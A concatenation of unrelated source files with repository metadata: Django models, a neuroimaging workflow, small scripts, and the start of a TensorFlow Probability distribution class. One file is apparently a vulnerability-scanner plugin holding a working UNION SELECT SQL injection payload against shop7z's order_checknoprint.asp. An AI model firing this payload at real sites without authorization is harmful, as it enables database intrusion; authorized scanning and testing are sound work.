5b09999136264f3b86f6cc291e202df18999fb3c | 5fd59608e3b0ea2a92ac19f9104f7a9a7c10bd03 | /apps/components/floors/models.py | 1d6656253db58a9a35934385d3f2eefc22f5ecc2 | [] | no_license | tmac408/makahiki | 47251470e1db3ee2fa6a7fdfd5ac83153dd7945a | c489bc6870a755bcb4c830be9c112047afde9fbe | refs/heads/master | 2021-01-10T20:35:27.096381 | 2011-07-05T04:27:54 | 2011-07-05T04:27:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,973 | py | import datetime
from django.db import models
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
from django.db.models import Sum, Max, Q
from components.makahiki_base import get_floor_label, get_current_round
# Create your models here.
class Dorm(models.Model):
    """A residence hall; parent grouping for :class:`Floor`."""
    # Automatically populate slug field when the name is added.
    prepopulated_fields = {"slug": ("name",)}

    name = models.CharField(max_length=200, help_text="The name of the dorm.")
    slug = models.SlugField(max_length=20, help_text="Automatically generated if left blank.")
    created_at = models.DateTimeField(editable=False)
    updated_at = models.DateTimeField(null=True, editable=False)

    def __unicode__(self):
        return self.name

    def floor_points_leaders(self, num_results=10, round_name=None):
        """
        Returns the top points leaders for the given dorm, ordered by total
        points (ties broken by most recent awarded submission). Restricted
        to a single round when ``round_name`` is given.
        """
        if round_name:
            return self.floor_set.filter(
                profile__scoreboardentry__round_name=round_name
            ).annotate(
                points=Sum("profile__scoreboardentry__points"),
                last=Max("profile__scoreboardentry__last_awarded_submission")
            ).order_by("-points", "-last")[:num_results]

        return self.floor_set.annotate(
            points=Sum("profile__points"),
            last=Max("profile__last_awarded_submission")
        ).order_by("-points", "-last")[:num_results]

    def save(self, *args, **kwargs):
        """Custom save method to generate slug and set created_at/updated_at."""
        if not self.slug:
            self.slug = slugify(self.name)

        # Bug fix: use a full datetime — the columns are DateTimeFields and
        # Post.save() already stamps with datetime.datetime.today().
        if not self.created_at:
            self.created_at = datetime.datetime.today()
        else:
            self.updated_at = datetime.datetime.today()

        # Bug fix: forward Django's save() arguments (force_insert, using,
        # ...) instead of silently dropping them.
        super(Dorm, self).save(*args, **kwargs)
class Floor(models.Model):
    """A floor within a :class:`Dorm`; the unit teams compete as."""
    prepopulated_fields = {"slug": ("number",)}

    number = models.CharField(help_text="The floor number in the dorm. Can be a string value", max_length=10)
    slug = models.SlugField(max_length=10, help_text="Automatically generated if left blank.")
    dorm = models.ForeignKey(Dorm, help_text="The dorm this floor belongs to.")
    floor_identifier = models.CharField(
        max_length=200,
        blank=True,
        null=True,
        help_text="Name of the source used in WattDepot to refer to this floor."
    )

    def __unicode__(self):
        return "%s: %s %s" % (self.dorm.name, get_floor_label(), self.number)

    @staticmethod
    def floor_points_leaders(num_results=10, round_name=None):
        """
        Returns the floor points leaders across all dorms, ordered by total
        points with ties broken by most recent awarded submission.
        """
        if round_name:
            return Floor.objects.filter(
                profile__scoreboardentry__round_name=round_name
            ).annotate(
                points=Sum("profile__scoreboardentry__points"),
                last=Max("profile__scoreboardentry__last_awarded_submission")
            ).order_by("-points", "-last")[:num_results]

        return Floor.objects.annotate(
            points=Sum("profile__points"),
            last=Max("profile__last_awarded_submission")
        ).order_by("-points", "-last")[:num_results]

    def points_leaders(self, num_results=10, round_name=None):
        """
        Gets the individual points leaders for the floor.
        """
        if round_name:
            return self.profile_set.filter(
                scoreboardentry__round_name=round_name
            ).order_by("-scoreboardentry__points", "-scoreboardentry__last_awarded_submission")[:num_results]

        return self.profile_set.all().order_by("-points", "-last_awarded_submission")[:num_results]

    def current_round_rank(self):
        """Rank within the current round, or None when no round is active."""
        current_round = get_current_round()
        if current_round:
            return self.rank(round_name=current_round)

        return None

    def rank(self, round_name=None):
        """Returns the rank of the floor across all dorms.

        Rank = 1 + (floors with strictly more points) + (floors tied on
        points whose last awarded submission is more recent).
        """
        if round_name:
            # Local import to avoid a circular dependency with the profiles app.
            from components.makahiki_profiles.models import ScoreboardEntry
            aggregate = ScoreboardEntry.objects.filter(
                profile__floor=self,
                round_name=round_name
            ).aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
            points = aggregate["points"] or 0
            last_awarded_submission = aggregate["last"]
            # Group by floors, filter out other rounds, and annotate.
            # NOTE(review): this branch annotates the alias `last_awarded`,
            # but the tie-break filter below uses `last_awarded_submission`
            # (the raw field) — verify the tie-break behaves as intended for
            # per-round ranks.
            annotated_floors = ScoreboardEntry.objects.values("profile__floor").filter(
                round_name=round_name
            ).annotate(
                floor_points=Sum("points"),
                last_awarded=Max("last_awarded_submission")
            )
        else:
            aggregate = self.profile_set.aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
            points = aggregate["points"] or 0
            last_awarded_submission = aggregate["last"]
            annotated_floors = Floor.objects.annotate(
                floor_points=Sum("profile__points"),
                last_awarded_submission=Max("profile__last_awarded_submission")
            )

        count = annotated_floors.filter(floor_points__gt=points).count()
        # If there was a submission, tack that on to the count.
        if last_awarded_submission:
            count = count + annotated_floors.filter(
                floor_points=points,
                last_awarded_submission__gt=last_awarded_submission
            ).count()

        return count + 1

    def current_round_points(self):
        """Returns the number of points for the current round."""
        current_round = get_current_round()
        if current_round:
            return self.points(round_name=current_round)

        return None

    def points(self, round_name=None):
        """Returns the total number of points for the floor. Takes an optional parameter for a round."""
        if round_name:
            from components.makahiki_profiles.models import ScoreboardEntry
            dictionary = ScoreboardEntry.objects.filter(profile__floor=self, round_name=round_name).aggregate(Sum("points"))
        else:
            dictionary = self.profile_set.aggregate(Sum("points"))

        return dictionary["points__sum"] or 0

    def save(self, *args, **kwargs):
        """Custom save method to generate slug.

        Bug fix: the override previously declared ``save(self)`` only, which
        broke any caller passing Django's standard save() arguments
        (``using=``, ``force_insert=``, ...). They are now accepted and
        forwarded.
        """
        if not self.slug:
            self.slug = slugify(self.number)

        super(Floor, self).save(*args, **kwargs)
class Post(models.Model):
    """Represents a wall post on a user's wall."""
    user = models.ForeignKey(User)
    floor = models.ForeignKey(Floor)
    text = models.TextField()
    style_class = models.CharField(max_length=50, default="user_post") #CSS class to apply to this post.
    created_at = models.DateTimeField(editable=False)

    def date_string(self):
        """Formats the created date into a pretty string."""
        return self.created_at.strftime("%m/%d %I:%M %p")

    def save(self, *args, **kwargs):
        """Stamp created_at on first save, then delegate to Django.

        Bug fix: accept and forward Django's save() arguments instead of
        declaring ``save(self)`` and dropping them.
        """
        if not self.created_at:
            self.created_at = datetime.datetime.today()
        super(Post, self).save(*args, **kwargs)
class PostComment(models.Model):
    """A comment attached to a wall :class:`Post`."""
    user = models.ForeignKey(User)
    post = models.ForeignKey(Post)
    text = models.TextField()
    created_at = models.DateTimeField(editable=False)

    def save(self, *args, **kwargs):
        """Stamp created_at on first save, then delegate to Django.

        Bug fixes: forward Django's save() arguments, and stamp with a full
        datetime — the field is a DateTimeField and the sibling Post model
        uses datetime.datetime.today(), while this one used date.today().
        """
        if not self.created_at:
            self.created_at = datetime.datetime.today()
        super(PostComment, self).save(*args, **kwargs)
"keoki.lee@gmail.com"
] | keoki.lee@gmail.com |
19047e76956f8fedb8ea5ec36d0d5e187ac40374 | 21aa8c66a53e425b7ab3169c481a472d090ecdc0 | /xcp_abcd/workflow/postprocessing.py | 1ec3523d21f86d5d810b95391862ccf877a48b69 | [
"MIT"
] | permissive | a3sha2/xcp_abcd | 0d1d0a34ce6497f3d3c7fb56f5d0268a9e35748d | 76e8fce12bf445c11a89d1b9de2efdcfa2174dc5 | refs/heads/main | 2023-04-23T20:35:47.949940 | 2021-05-18T12:39:19 | 2021-05-18T12:39:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,283 | py | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
post processing the bold/cifti
^^^^^^^^^^^^^^^^^^^^^^^^
.. autofunction:: init_post_process_wf
"""
import numpy as np
from nipype.pipeline import engine as pe
from templateflow.api import get as get_template
from ..interfaces import (ConfoundMatrix,FilteringData,regress)
from ..interfaces import (interpolate,removeTR,censorscrub)
from nipype.interfaces import utility as niu
from nipype.interfaces.workbench import CiftiSmooth
from nipype.interfaces.fsl import Smooth
import sklearn
from niworkflows.engine.workflows import LiterateWorkflow as Workflow
def init_post_process_wf(
    mem_gb,
    TR,
    head_radius,
    lower_bpf,
    upper_bpf,
    bpf_order,
    smoothing,
    bold_file,
    params,
    motion_filter_type,
    band_stop_max,
    band_stop_min,
    motion_filter_order,
    contigvol,
    cifti=False,
    dummytime=0,
    fd_thresh=0,
    name="post_process_wf",
     ):
    """
    Organize the bold/cifti post-processing workflow: confound-matrix
    selection, optional dummy-scan removal, censoring/scrubbing, nuisance
    regression, interpolation, band-pass filtering, and optional smoothing.

    Workflow Graph
        .. workflow::
            :graph2use: orig
            :simple_form: yes

            from xcp_abcd.workflows import init_post_process_wf
            wf = init_post_process_wf(
                mem_gb,
                TR,
                head_radius,
                lower_bpf,
                upper_bpf,
                bpf_order,
                smoothing,
                bold_file,
                params,
                motion_filter_type,
                band_stop_max,
                band_stop_min,
                motion_filter_order,
                contigvol,
                cifti=False,
                dummytime=0,
                fd_thresh=0,
                name="post_process_wf",
             )

    Parameters
    ----------
    mem_gb : float
        Memory (GB) allocated to each node.
    TR : float
        Repetition time in seconds.
    head_radius : float
        Radius of the head (mm) for framewise-displacement computation.
    lower_bpf : float
        Lower band-pass filter cutoff (Hz).
    upper_bpf : float
        Upper band-pass filter cutoff (Hz).
    bpf_order : int
        Order of the band-pass filter.
    smoothing : float
        Smoothing kernel size (FWHM, mm) for the derivative outputs.
    bold_file : str
        BOLD file to post-process.
    params : str
        Nuisance-regressor set selected from the fMRIPrep confounds.
    motion_filter_type : str
        Respiratory motion filter type: 'lp' or 'notch'.
    band_stop_max : float
        Respiratory maximum frequency in breaths per minute (bpm).
    band_stop_min : float
        Respiratory minimum frequency in breaths per minute (bpm).
    motion_filter_order : int
        Respiratory motion filter order.
    contigvol : int
        Number of contiguous volumes.
    cifti : bool
        Whether the input is a CIFTI (surface) file rather than NIFTI.
    dummytime : float
        Initial seconds of data removed before post-processing.
    fd_thresh : float
        Criterion for flagging framewise-displacement outliers.
    name : str
        Workflow name.

    Inputs
    ------
    bold
        bold or cifti file
    bold_mask
        bold mask if bold is nifti
    custom_conf
        custom regressors

    Outputs
    -------
    processed_bold
        processed or cleaned bold
    smoothed_bold
        smoothed processed bold
    tmask
        temporal mask
    """
    workflow = Workflow(name=name)
    workflow.__desc__ = """ \

"""
    # Build the boilerplate methods text; the {nvol}/{fd_thresh} placeholders
    # are filled from the runtime settings. (Note: spelling inside these
    # strings is part of the emitted report and is left untouched.)
    if dummytime > 0:
        nvolx = str(np.floor(dummytime / TR))
        workflow.__desc__ = workflow.__desc__ + """ \
Before nuissance regression and filtering of the data, the first {nvol} were discarded,
.Furthermore, any volumes with framewise-displacement greater than
{fd_thresh} [@satterthwaite2;@power_fd_dvars;@satterthwaite_2013] were flagged as outliers
and excluded from nuissance regression.
""".format(nvol=nvolx,fd_thresh=fd_thresh)
    else:
        workflow.__desc__ = workflow.__desc__ + """ \
Before nuissance regression and filtering any volumes with framewise-displacement greater than
{fd_thresh} [@satterthwaite2;@power_fd_dvars;@satterthwaite_2013] were flagged as outlier
and excluded from further analyses.
""".format(fd_thresh=fd_thresh)
    workflow.__desc__ = workflow.__desc__ + """ \
The following nuissance regressors {regressors} [@mitigating_2018;@benchmarkp;@satterthwaite_2013] were selected
from nuissance confound matrices of fMRIPrep output. These nuissance regressors were regressed out
from the bold data with *LinearRegression* as implemented in Scikit-Learn {sclver} [@scikit-learn].
The residual were then band pass filtered within the frequency band {highpass}-{lowpass} Hz.
""".format(regressors=stringforparams(params=params),sclver=sklearn.__version__,
    lowpass=upper_bpf,highpass=lower_bpf)

    # --- Workflow I/O nodes -------------------------------------------------
    inputnode = pe.Node(niu.IdentityInterface(
        fields=['bold','bold_file','bold_mask','custom_conf']), name='inputnode')
    outputnode = pe.Node(niu.IdentityInterface(
        fields=['processed_bold', 'smoothed_bold','tmask','fd']), name='outputnode')
    inputnode.inputs.bold_file = bold_file

    # --- Processing nodes ---------------------------------------------------
    confoundmat = pe.Node(ConfoundMatrix(head_radius=head_radius, params=params,
                filtertype=motion_filter_type,cutoff=band_stop_max,
                low_freq=band_stop_max,high_freq=band_stop_min,TR=TR,
                filterorder=motion_filter_order),
                  name="ConfoundMatrix", mem_gb=mem_gb)
    filterdx = pe.Node(FilteringData(tr=TR,lowpass=upper_bpf,highpass=lower_bpf,
                filter_order=bpf_order),
                    name="filter_the_data", mem_gb=mem_gb)
    regressy = pe.Node(regress(tr=TR),
               name="regress_the_data",mem_gb=mem_gb)
    censor_scrubwf = pe.Node(censorscrub(fd_thresh=fd_thresh,TR=TR,
                head_radius=head_radius,contig=contigvol,
                time_todrop=dummytime),
                name="censor_scrub",mem_gb=mem_gb)
    interpolatewf = pe.Node(interpolate(TR=TR),
                  name="interpolation",mem_gb=mem_gb)
    if dummytime > 0:
        rm_dummytime = pe.Node(removeTR(time_todrop=dummytime,TR=TR),
                      name="remove_dummy_time",mem_gb=mem_gb)

    # get the confound matrix
    workflow.connect([
             # connect bold confound matrix to extract confound matrix
            (inputnode, confoundmat, [('bold_file', 'in_file'),]),
         ])
    # Pipeline shape: [remove_dummy_time ->] censor_scrub -> regress ->
    # interpolate (over censored frames) -> band-pass filter -> outputs.
    if dummytime > 0:
        workflow.connect([
              (confoundmat,rm_dummytime,[('confound_file','fmriprep_conf'),]),
              (inputnode,rm_dummytime,[('bold','bold_file'),
                               ('bold_mask','mask_file'),])
             ])
        # NOTE(review): `inputnode.inputs.custom_conf` is evaluated at
        # workflow-construction time, so the custom-confound branch is wired
        # only if the attribute is set before this factory runs — confirm
        # callers do so.
        if inputnode.inputs.custom_conf:
            workflow.connect([ (inputnode,rm_dummytime,[('custom_conf','custom_conf')]),
                 (rm_dummytime,censor_scrubwf,[('custom_confdropTR','custom_conf')]),
                 (censor_scrubwf,regressy,[('customconf_censored','custom_conf')]),])
        workflow.connect([
            (rm_dummytime,censor_scrubwf,[('bold_file_TR','in_file'),
                        ('fmrip_confdropTR','fmriprep_conf'),]),
            (inputnode,censor_scrubwf,[('bold_file','bold_file'),
                           ('bold_mask','mask_file')]),
            (censor_scrubwf,regressy,[('bold_censored','in_file'),
                        ('fmriprepconf_censored','confounds')]),
            (inputnode,regressy,[('bold_mask','mask')]),
            (inputnode, filterdx,[('bold_mask','mask')]),
            (inputnode, interpolatewf,[('bold_mask','mask_file')]),
            (regressy,interpolatewf,[('res_file','in_file'),]),
            (censor_scrubwf,interpolatewf,[('tmask','tmask'),]),
            (censor_scrubwf,outputnode,[('tmask','tmask')]),
            (inputnode,interpolatewf,[('bold_file','bold_file')]),
            (interpolatewf,filterdx,[('bold_interpolated','in_file')]),
            (filterdx,outputnode,[('filt_file','processed_bold')]),
            (censor_scrubwf,outputnode,[('fd_timeseries','fd')])
            ])
    else:
        # No dummy-scan removal: the confound matrix feeds censor_scrub directly.
        if inputnode.inputs.custom_conf:
            workflow.connect([
             (inputnode,censor_scrubwf,[('custom_conf','custom_conf')]),
             (censor_scrubwf,regressy,[('customconf_censored','custom_conf')]) ])
        workflow.connect([
             (inputnode,censor_scrubwf,[('bold','in_file'),
                            ('bold_file','bold_file'),
                            ('bold_mask','mask_file'),]),
             (confoundmat,censor_scrubwf,[('confound_file','fmriprep_conf')]),
             (censor_scrubwf,regressy,[('bold_censored','in_file'),
                      ('fmriprepconf_censored','confounds'),]),
             (inputnode,regressy,[('bold_mask','mask')]),
             (inputnode, interpolatewf,[('bold_mask','mask_file')]),
             (regressy,interpolatewf,[('res_file','in_file'),]),
             (censor_scrubwf,interpolatewf,[('tmask','tmask'),]),
             (censor_scrubwf,outputnode,[('tmask','tmask')]),
             (inputnode,interpolatewf,[('bold_file','bold_file')]),
             (interpolatewf,filterdx,[('bold_interpolated','in_file')]),
             (filterdx,outputnode,[('filt_file','processed_bold')]),
             (inputnode, filterdx,[('bold_mask','mask')]),
             (censor_scrubwf,outputnode,[('fd_timeseries','fd')])
            ])
    if smoothing:
        # Convert the requested FWHM once; both smoothing paths use it.
        sigma_lx = fwhm2sigma(smoothing)
        if cifti:
            workflow.__desc__ = workflow.__desc__ + """ \
The processed bold was smoothed with the workbench with kernel size (FWHM) of {kernelsize} mm .
""" .format(kernelsize=str(smoothing))
            smooth_data = pe.Node(CiftiSmooth(sigma_surf = sigma_lx, sigma_vol=sigma_lx, direction ='COLUMN',
                  right_surf=str(get_template("fsLR", hemi='R',suffix='sphere',density='32k')[0]),
                  left_surf=str(get_template("fsLR", hemi='L',suffix='sphere',density='32k')[0])),
                   name="cifti_smoothing", mem_gb=mem_gb)
            workflow.connect([
                   (filterdx, smooth_data,[('filt_file','in_file')]),
                   (smooth_data, outputnode,[('out_file','smoothed_bold')])
              ])
        else:
            workflow.__desc__ = workflow.__desc__ + """ \
The processed bold was smoothed with FSL and kernel size (FWHM) of {kernelsize} mm.
""" .format(kernelsize=str(smoothing))
            smooth_data = pe.Node(Smooth(output_type = 'NIFTI_GZ',fwhm = smoothing),
                   name="nifti_smoothing", mem_gb=mem_gb )
            workflow.connect([
                   (filterdx, smooth_data,[('filt_file','in_file')]),
                   (smooth_data, outputnode,[('smoothed_file','smoothed_bold')])
              ])
    ## smoothing the data if requested
    return workflow
def fwhm2sigma(fwhm):
    """Convert a Gaussian kernel FWHM to its standard deviation (sigma)."""
    # FWHM = sigma * sqrt(8 * ln 2); invert that relation.
    conversion_factor = np.sqrt(8 * np.log(2))
    return fwhm / conversion_factor
def stringforparams(params):
    """Return the prose description of the nuisance-regressor set *params*.

    Used to build the boilerplate methods text. Recognized codes are
    '24P', '27P' and '36P'.

    Raises
    ------
    ValueError
        If *params* is not a recognized code. (Bug fix: previously an
        unknown code fell through to ``return bsignal`` with the name
        unbound, raising an opaque NameError.)
    """
    bsignal = None
    if params == '24P':
        bsignal = "including six motion parameters with their temporal derivatives, \
quadratic expansion of both six motion paramters and their derivatives \
to make a total of 24 nuissance regressors "
    if params == '27P':
        bsignal = "including six motion parameters with their temporal derivatives, \
quadratic expansion of both six motion paramters and their derivatives, global signal, \
white and CSF signal to make a total 27 nuissance regressors"
    if params == '36P':
        bsignal= "including six motion parameters, white ,CSF and global signals, with their temporal derivatives, \
quadratic expansion of these nuissance regressors and their derivatives  \
to make a total 36 nuissance regressors"
    if bsignal is None:
        raise ValueError("Unrecognized nuisance parameter set: {}".format(params))
    return bsignal
| [
"azeez.adebimpe@outlook.com"
] | azeez.adebimpe@outlook.com |
45e77e2a9c803a25003af8d423e528ff7874eea9 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/shop7z/shop7z_order_checknoprint_sqli.py | 85f9412e216939cff4178425a6cdb8666ba5093a | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,414 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: shop7z order_checknoprint.asp SQL注入
referer: http://www.wooyun.org/bugs/wooyun-2010-068345
author: Lucifer
description: 文件order_checknoprint.asp中,参数id存在SQL注入。
'''
import sys
import requests
class shop7z_order_checknoprint_sqli_BaseVerify:
    """Probe a target for the shop7z order_checknoprint.asp SQL injection."""

    def __init__(self, url):
        self.url = url

    def run(self):
        """Send the canned UNION-SELECT probe and report based on the echo.

        Returns a "[+]" finding string when the marker is reflected, a
        "[-]connect timeout" string on any request failure, and None when
        the target responds without the marker.
        """
        http_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # The CHR() sequence (32,35,116,121,113,35) decodes to " #tyq#" —
        # seeing that marker in the body means the UNION SELECT executed.
        probe = "/order_checknoprint.asp?checkno=1&id=1%20UNION%20SELECT%201%2C2%2CCHR%2832%29%2bCHR%2835%29%2bCHR%28116%29%2bCHR%28121%29%2bCHR%28113%29%2bCHR%2835%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%20from%20MSysAccessObjects"
        vulnurl = self.url + probe
        try:
            response = requests.get(vulnurl, headers=http_headers, timeout=10, verify=False)
            if r"#tyq#" in response.text:
                return "[+]存在shop7z order_checknoprint.asp SQL注入漏洞...(高危)\tpayload: "+vulnurl
        except:
            return "[-]connect timeout"
if __name__ == "__main__":
    # CLI usage: python shop7z_order_checknoprint_sqli.py <base_url>
    testVuln = shop7z_order_checknoprint_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"834430486@qq.com"
] | 834430486@qq.com |
0fbf2d8f2f31b5556b486c568da417a2ac0933a1 | 4b379051aa3430eb2d8931f6055772731dcb199d | /512-Python_основы_и_применение/24471/stepik-512_24471-step7.py | 8ead90784919d275251ba0e63a734f6a778ab201 | [] | no_license | dmikos/stepikCourse | 1416614ef51a4352374f37e86e3211c3b42cbaf6 | 3faeabfdc56cac597fb6b1495e7bb38a7f2a6816 | refs/heads/master | 2021-01-12T17:06:37.720050 | 2016-11-21T14:37:20 | 2016-11-21T14:37:20 | 69,057,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import requests
import re
from urllib.parse import urlparse
# link = input()
link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7.html"
# link = "http://pastebin.com/raw/2mie4QYa"
#test3
# link = "http://pastebin.com/raw/7543p0ns"
# link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7-test3.html"
# Crude href matcher: everything between the quote after `href=` and the last
# quote on the line (greedy `.+`) -- good enough for this course exercise.
pattern = re.compile(r"href *= *[',\"].+[',\"]")
res = pattern.findall(requests.get(link).text)
# Unique hosts (for absolute links) and paths (for relative links).
finset = set()
for line in res:
    # Strip the surrounding quote characters; element 1 is the URL itself.
    line = re.split(r"[',\"]", str(line))[1]
    if line.startswith("../"):
        continue
    elif urlparse(line).scheme == '':
        # finset.add((urlparse(line).path).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).path)
        finset.add(urlparse(line).path)
    elif urlparse(line).scheme:
        # Absolute URL: keep only the hostname, dropping any explicit port.
        finset.add((urlparse(line).netloc).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).netloc)
# print(sorted(finset))
# Emit the unique entries in sorted order, one per line.
for stroke in sorted(finset):
    print(stroke)
"""
Output
mail.ru
neerc.ifmo.ru
stepic.org
www.ya.ru
ya.ru
""" | [
"dkostinov@gmail.com"
] | dkostinov@gmail.com |
67aa0ecaa841b2950f17b83d5e2e87f4235094b3 | 0a1e4f7105aba084054eaf32e2000efaa564a3cd | /Chap 7/viet_hoa_ten.py | b59b4001c9bd0093bfc5f8ef44fe983fb78fbcb8 | [] | no_license | tucpy/basic_python | b322cf4def209b165a4cd84994f13c41d14d3ec7 | 28adf05c1ef3f81dbcc034daea370d5e5b7b6ad6 | refs/heads/master | 2020-03-29T01:13:52.067014 | 2018-10-27T01:31:15 | 2018-10-27T01:31:15 | 149,378,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py |
# Read a full name from stdin ("Nhap ho va ten" = "Enter full name" in Vietnamese).
chuoi = str(input("Nhap ho va ten: "))
# Split on whitespace into the individual words of the name.
list_tu = chuoi.split()
print(list_tu)
# Accumulator for the re-built, properly capitalized name.
chuoi_xu_ly =""
for tu in list_tu:
    # capitalize(): first letter upper-cased, the rest lower-cased.
    tu_xu_ly = tu.capitalize()
    chuoi_xu_ly += tu_xu_ly +" "
print(chuoi_xu_ly) | [
"phtu05@gmail.com"
] | phtu05@gmail.com |
310e7dc1e96517addbe6292968c00ff9d8f7b730 | 0b25dc3f9b4ef736e739aadddec33b96dd65a0c8 | /测试/data_time.py | 90ddb7902f29abef8a0087c5857877da14ba8b25 | [] | no_license | ttp55/LearnPy | b123f44a74e4364771491c572705742c15eb33ff | 1530e158bde152e5c585f496dd1e5ffcffdb73bc | refs/heads/master | 2023-05-11T13:02:30.157285 | 2023-05-08T07:13:57 | 2023-05-08T07:13:57 | 196,953,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | # @time: 2019/8/12 15:49
# @author: WZG
# encoding: utf-8
import datetime
# Snapshot the current local wall-clock time; only the hour is used below.
d = datetime.datetime.now()
print(d.hour) | [
"1047697347@qq.com"
] | 1047697347@qq.com |
5b7439666b70413e97fe6747a21e163c2f742c3b | 62e9fb33329fbefa89287e5bc343cb9c120306a1 | /tensorflow_probability/python/distributions/generalized_pareto.py | 8bf088dc807a7e15c4528a51130642d4c7d02d93 | [
"Apache-2.0"
] | permissive | npfp/probability | 3c103d4b9d7a72d3d16eb79b1e4f648afbaca057 | 3911f4463cdcca6cc118633742430885fb0c88cb | refs/heads/master | 2022-05-01T14:23:40.504258 | 2022-04-07T20:08:45 | 2022-04-07T20:10:58 | 246,853,846 | 0 | 0 | Apache-2.0 | 2020-03-12T14:23:04 | 2020-03-12T14:23:03 | null | UTF-8 | Python | false | false | 13,489 | py | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Generalized Pareto distribution."""
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import math as tfp_math
from tensorflow_probability.python.bijectors import generalized_pareto as generalized_pareto_bijector
from tensorflow_probability.python.bijectors import softplus as softplus_bijector
from tensorflow_probability.python.distributions import distribution
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensor_util
class GeneralizedPareto(distribution.AutoCompositeTensorDistribution):
  """The Generalized Pareto distribution.
  The Generalized Pareto distributions are a family of continuous distributions
  on the reals. Special cases include `Exponential` (when `loc = 0`,
  `concentration = 0`), `Pareto` (when `concentration > 0`,
  `loc = scale / concentration`), and `Uniform` (when `concentration = -1`).
  This distribution is often used to model the tails of other distributions.
  As a member of the location-scale family,
  `X ~ GeneralizedPareto(loc=loc, scale=scale, concentration=conc)` maps to
  `Y ~ GeneralizedPareto(loc=0, scale=1, concentration=conc)` via
  `Y = (X - loc) / scale`.
  For positive concentrations, the distribution is equivalent to a hierarchical
  Exponential-Gamma model with `X|rate ~ Exponential(rate)` and
  `rate ~ Gamma(concentration=1 / concentration, scale=scale / concentration)`.
  In the following, `samp1` and `samps2` are identically distributed:
  ```python
  genp = tfd.GeneralizedPareto(loc=0, scale=scale, concentration=conc)
  samps1 = genp.sample(1000)
  jd = tfd.JointDistributionNamed(dict(
      rate=tfd.Gamma(1 / genp.concentration, genp.scale / genp.concentration),
      x=lambda rate: tfd.Exponential(rate)))
  samps2 = jd.sample(1000)['x']
  ```
  The support of the distribution is always lower bounded by `loc`. When
  `concentration < 0`, the support is also upper bounded by
  `loc + scale / abs(concentration)`.
  #### Mathematical Details
  The probability density function (pdf) is,
  ```none
  pdf(x; mu, sigma, shp, x > mu) =
      (1 + shp * (x - mu) / sigma)**(-1 / shp - 1) / sigma
  ```
  where:
  * `concentration = shp`, any real value,
  * `scale = sigma`, `sigma > 0`,
  * `loc = mu`.
  The cumulative density function (cdf) is,
  ```none
  cdf(x; mu, sigma, shp, x > mu) = 1 - (1 + shp * (x - mu) / sigma)**(-1 / shp)
  ```
  Distribution parameters are automatically broadcast in all functions; see
  examples for details.
  Samples of this distribution are reparameterized (pathwise differentiable).
  #### Examples
  ```python
  import tensorflow_probability as tfp
  tfd = tfp.distributions
  dist = tfd.GeneralizedPareto(loc=1., scale=2., concentration=0.03)
  dist2 = tfd.GeneralizedPareto(loc=-2., scale=[3., 4.],
                                concentration=[[-.4], [0.2]])
  ```
  Compute the gradients of samples w.r.t. the parameters:
  ```python
  loc = tf.Variable(3.0)
  scale = tf.Variable(2.0)
  conc = tf.Variable(0.1)
  dist = tfd.GeneralizedPareto(loc, scale, conc)
  with tf.GradientTape() as tape:
    samples = dist.sample(5)  # Shape [5]
    loss = tf.reduce_mean(tf.square(samples))  # Arbitrary loss function
  # Unbiased stochastic gradients of the loss function
  grads = tape.gradient(loss, dist.variables)
  ```
  """
  def __init__(self,
               loc,
               scale,
               concentration,
               validate_args=False,
               allow_nan_stats=True,
               name=None):
    """Construct a Generalized Pareto distribution.
    Args:
      loc: The location / shift of the distribution. GeneralizedPareto is a
        location-scale distribution. This parameter lower bounds the
        distribution's support. Must broadcast with `scale`, `concentration`.
        Floating point `Tensor`.
      scale: The scale of the distribution. GeneralizedPareto is a
        location-scale distribution, so doubling the `scale` doubles a sample
        and halves the density. Strictly positive floating point `Tensor`. Must
        broadcast with `loc`, `concentration`.
      concentration: The shape parameter of the distribution. The larger the
